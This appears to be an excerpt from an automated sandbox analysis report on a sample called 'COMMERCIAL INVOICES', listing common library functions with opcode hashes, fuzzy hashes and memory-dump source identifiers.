                                                                                                                                                                                                                                      • Instruction ID: 57d6c32c4def5f6b616ddd1228657c34e7e60562738c620cedc3558f2ba26700
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d22ff452b561811b4b444561d6bb1e4518ae270bd7305b35f1000cd1cc344714
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB90022121544842D600755C5408A06000597D1205F59D011A2068595DC6398951A235
                                                                                                                                                                                                                                      Function 01282D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4f4e756078df44a21c1faff916d7f181781623f0aed4500c7a79c8b413b2ee97
                                                                                                                                                                                                                                      • Instruction ID: f3ed4f3d5edf60de66f75158fced605ac964d90eb59ad3f87193ea28b478da0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f4e756078df44a21c1faff916d7f181781623f0aed4500c7a79c8b413b2ee97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1190022922340402D680715C540860A000597D2202F99D415A1019558CC91989695325
                                                                                                                                                                                                                                      Function 01282DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2bab2901009a61275211edc1f9028b0f6660cefcfeef9507094a04a30cc5fbde
                                                                                                                                                                                                                                      • Instruction ID: 2360e666801d92344469f6b4944599acb74874e40b12243e6abc6343c4f68d1a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bab2901009a61275211edc1f9028b0f6660cefcfeef9507094a04a30cc5fbde
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A590023125140802D641715C44046060009A7D1241F99C012A1428554EC6598B56AB65
                                                                                                                                                                                                                                      Function 01282DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4c27c408e1bb46812d7df7a0910b41eaf71800bc1e4e78fdd9fbffa47bda56e4
                                                                                                                                                                                                                                      • Instruction ID: 3a79a41d787db5d11332207311ca548f6ac10b0fe2b46c219506f5483c9a25ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c27c408e1bb46812d7df7a0910b41eaf71800bc1e4e78fdd9fbffa47bda56e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14900221252445525A45B15C44045074006A7E1241799C012A2418950CC52A9956D725
                                                                                                                                                                                                                                      Function 01282C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d68137f45c1b5271bf730b2bdc0a9947161e735645f2c7b90354e952ecb3f25a
                                                                                                                                                                                                                                      • Instruction ID: 7a163748cbd01d208bcdf3de84e8da21125be250b5fdde4bef2013834f674ed3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d68137f45c1b5271bf730b2bdc0a9947161e735645f2c7b90354e952ecb3f25a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B190023121140C42D600715C4404B46000597E1301F59C016A1128654DC619C9517625
                                                                                                                                                                                                                                      Function 01282CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9b9828d368121609b0ceb1d8290666a05c72687b1b2c7fa148fd134fb6d076b7
                                                                                                                                                                                                                                      • Instruction ID: 140790ba690b4cadb8b68377966754f7783bec1ec9cbeca58ec960676d54d96c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b9828d368121609b0ceb1d8290666a05c72687b1b2c7fa148fd134fb6d076b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3590023121140802D600759C5408646000597E1301F59D011A6028555EC66989916235
                                                                                                                                                                                                                                      Function 01282CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bbea4e5c6725dfe7b3203b3edb16eb1b4d26f1b77bc7d859657c25740f402da2
                                                                                                                                                                                                                                      • Instruction ID: d8d353df97b8354fca8a8710b2ed464c78fd37ed559996dc97f4454981ecb113
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbea4e5c6725dfe7b3203b3edb16eb1b4d26f1b77bc7d859657c25740f402da2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E90023121140803D600715C5508707000597D1201F59D411A1428558DD65A89516225
                                                                                                                                                                                                                                      Function 01282CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 58e85228490281f32f7e8f04d1385e9ce8f3a28c72509ac61b0735cd0795e8c7
                                                                                                                                                                                                                                      • Instruction ID: 5d98182a9d95f29490a979307acd796f98a4826373502360db3876109ca0c73b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58e85228490281f32f7e8f04d1385e9ce8f3a28c72509ac61b0735cd0795e8c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E90022161540802D640715C5418706001597D1201F59D011A1028554DC65D8B5567A5
                                                                                                                                                                                                                                      Function 01282F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 13b571c4b255ca56bfe85a490e49ac8403197d3baa196370d588a39fa354c7d2
                                                                                                                                                                                                                                      • Instruction ID: b7084fc8f0f0b87db6dc263c0abc5dac8230928f00039a46622d6a19582e717c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13b571c4b255ca56bfe85a490e49ac8403197d3baa196370d588a39fa354c7d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A690026135140842D600715C4414B060005D7E2301F59C015E2068554DC61DCD52622A
                                                                                                                                                                                                                                      Function 01282F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fcb95ab2c422625403439f0ad8303433306355fbf13466f1435f8c6492b420b8
                                                                                                                                                                                                                                      • Instruction ID: 56667f5ff26b1575244f98658fc20787bec7253cbaa3afd5349170cfccd15076
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcb95ab2c422625403439f0ad8303433306355fbf13466f1435f8c6492b420b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA90026122140442D604715C4404706004597E2201F59C012A3158554CC52D8D615229
                                                                                                                                                                                                                                      Function 01282FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f251784f7d1c4791ad9dfc1caa2238c5cd94f5012b9edf00edc7463c2012b29e
                                                                                                                                                                                                                                      • Instruction ID: 7d195c9f78f0df1af48cb6ccf415e58047c49a4f039e878b613f3928336fb39e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f251784f7d1c4791ad9dfc1caa2238c5cd94f5012b9edf00edc7463c2012b29e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0190023121180802D600715C4808747000597D1302F59C011A6168555EC669C9916635
                                                                                                                                                                                                                                      Function 01282FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 39e537a24de3a856b17e67c9980b1888b6d867513a7c1fb88ce58632e7999d88
                                                                                                                                                                                                                                      • Instruction ID: 1d33addc1e7c037fa0ea7be970f02bbdcd2f92adcf17fc2a873f3cf4be4130f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39e537a24de3a856b17e67c9980b1888b6d867513a7c1fb88ce58632e7999d88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C900221611404424640716C88449064005BBE2211759C121A199C550DC55D89655769
                                                                                                                                                                                                                                      Function 01282F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4dfcf41c7d6f2a9b395285ebdf241cf300a99bc59fe833ed6b87d8b3fab288dd
                                                                                                                                                                                                                                      • Instruction ID: 1f550bad51af70821b404eab377338584c86a239e9bbc96f9c193187d5d51cae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfcf41c7d6f2a9b395285ebdf241cf300a99bc59fe833ed6b87d8b3fab288dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4790023121180802D600715C481470B000597D1302F59C011A2168555DC62989516675
                                                                                                                                                                                                                                      Function 01282FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e375c2a074d0c5189471f96ba8c1060cc10b56775b32135f9eefcd5d17a1b5ab
                                                                                                                                                                                                                                      • Instruction ID: e5f2bec8818ab7056b579437975c4a27e1dcf66a314fd8936bbd6bbd885743fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e375c2a074d0c5189471f96ba8c1060cc10b56775b32135f9eefcd5d17a1b5ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2900221221C0442D700756C4C14B07000597D1303F59C115A1158554CC91989615625
                                                                                                                                                                                                                                      Function 01282E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 06518a6b5cf9a59c955856da64c9f9cde2b3d590ec73cb3cc1ac4584c24caf19
                                                                                                                                                                                                                                      • Instruction ID: 55b4be2e84dc2437745e55976c20646ce794fb26d46320617e864c0813564eef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06518a6b5cf9a59c955856da64c9f9cde2b3d590ec73cb3cc1ac4584c24caf19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F090022131140802D602715C44146060009D7D2345F99C012E2428555DC6298A53A236
                                                                                                                                                                                                                                      Function 01282EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ce09669a12bf6fb7eba418104b7bfafae9d424c0bd1b37115893b9be647d8681
                                                                                                                                                                                                                                      • Instruction ID: 10a520d1bda7d295ba5ec10ccd05bac954b78e603473c0dc4160f82118c78102
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce09669a12bf6fb7eba418104b7bfafae9d424c0bd1b37115893b9be647d8681
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5290027121140802D640715C4404746000597D1301F59C011A6068554EC65D8ED56769
                                                                                                                                                                                                                                      Function 01282E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 095ee5543573894066362f4fea170a730f2e298fe7626966bfd5095af3442525
                                                                                                                                                                                                                                      • Instruction ID: 4da4549befd4d089d8562477096d7a34a6bbc8fbd2c7e8960428fab4afadaffd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 095ee5543573894066362f4fea170a730f2e298fe7626966bfd5095af3442525
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3690022161140902D601715C4404616000A97D1241F99C022A2028555ECA298A92A235
                                                                                                                                                                                                                                      Function 01282EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 51e7a10a9ba901800bf2f3b0a18a4a5da19a1b72a83d3a461761cd68c8fe19bc
                                                                                                                                                                                                                                      • Instruction ID: abd97887aca4ceff31301a432f8b8db6dc651642cf09de0526adf23df37ea2ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e7a10a9ba901800bf2f3b0a18a4a5da19a1b72a83d3a461761cd68c8fe19bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A490026121180803D640755C4804607000597D1302F59C011A3068555ECA2D8D516239
                                                                                                                                                                                                                                      Function 01283010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 89a4a24dc7a428ee0244f01032e782e9c838b282eec177c0f1ec71bcaf02ce13
                                                                                                                                                                                                                                      • Instruction ID: de33c303dca5815210d679ababb384cbf94291460be807c443fcbae2aca10693
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a4a24dc7a428ee0244f01032e782e9c838b282eec177c0f1ec71bcaf02ce13
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F190022121184842D640725C4804B0F410597E2202F99C019A515A554CC91989555725
                                                                                                                                                                                                                                      Function 01283090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 76b02f6f29eb90878568e479268f81f0a81bcc71fefd451e38560a52e4365736
                                                                                                                                                                                                                                      • Instruction ID: e01d5193767273bae02c73d0aa4a81bd927ab66bc01106d30a58b5d5ae1dfadd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76b02f6f29eb90878568e479268f81f0a81bcc71fefd451e38560a52e4365736
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3790022125140C02D640715C84147070006D7D1601F59C011A1028554DC61A8A6567B5
                                                                                                                                                                                                                                      Function 012839B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 42c055a46566e7af00632d3ea82be4c2a4fe6b3f9d3bc316f5ab95ae20895ad1
                                                                                                                                                                                                                                      • Instruction ID: 9746016ae35e97153d1272fa1168ef4a94d81655d564d93a55d76ca19ab7558d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42c055a46566e7af00632d3ea82be4c2a4fe6b3f9d3bc316f5ab95ae20895ad1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C90022125545502D650715C44046164005B7E1201F59C021A1818594DC55989556325
                                                                                                                                                                                                                                      Function 01283D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: abf8d0b1a6fbe2a611216d38911eac96f946bc7a86072dba06a45fb172fad8b1
                                                                                                                                                                                                                                      • Instruction ID: e4ee4a9b905f55fa45c45efa68198b469ca32dbd3f3f607d45c2cdf5ba540a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abf8d0b1a6fbe2a611216d38911eac96f946bc7a86072dba06a45fb172fad8b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC900231212405429A40725C5804A4E410597E2302B99D415A1019554CC91889615325
                                                                                                                                                                                                                                      Function 01283D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 804c64f6a94c4fe4e343cb549cb4c83259a92bf0bfcbfea7228af5d8c71c3b65
                                                                                                                                                                                                                                      • Instruction ID: 4ed3ee26062d5618bcf70af5bf3eb4895fbb255311dcbe8151e15cf6a1d9a03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 804c64f6a94c4fe4e343cb549cb4c83259a92bf0bfcbfea7228af5d8c71c3b65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F490023521140802DA10715C5804646004697D1301F59D411A1428558DC65889A1A225
                                                                                                                                                                                                                                      Function 01282C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                      • Instruction ID: 29e6927d99b2765e6846c0ee09c39adc75e2256aa31bf01d1b475e726daf1453
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      Function 01282890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: ce67c5f1b3d703b5e277bc758a14030c69b2f480c43f91e58bae67a7c1c8ef83
                                                                                                                                                                                                                                      • Instruction ID: e020f38a01b813b67720fe443ae37aa8aa1046e4b414ec143c15479766986013
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce67c5f1b3d703b5e277bc758a14030c69b2f480c43f91e58bae67a7c1c8ef83
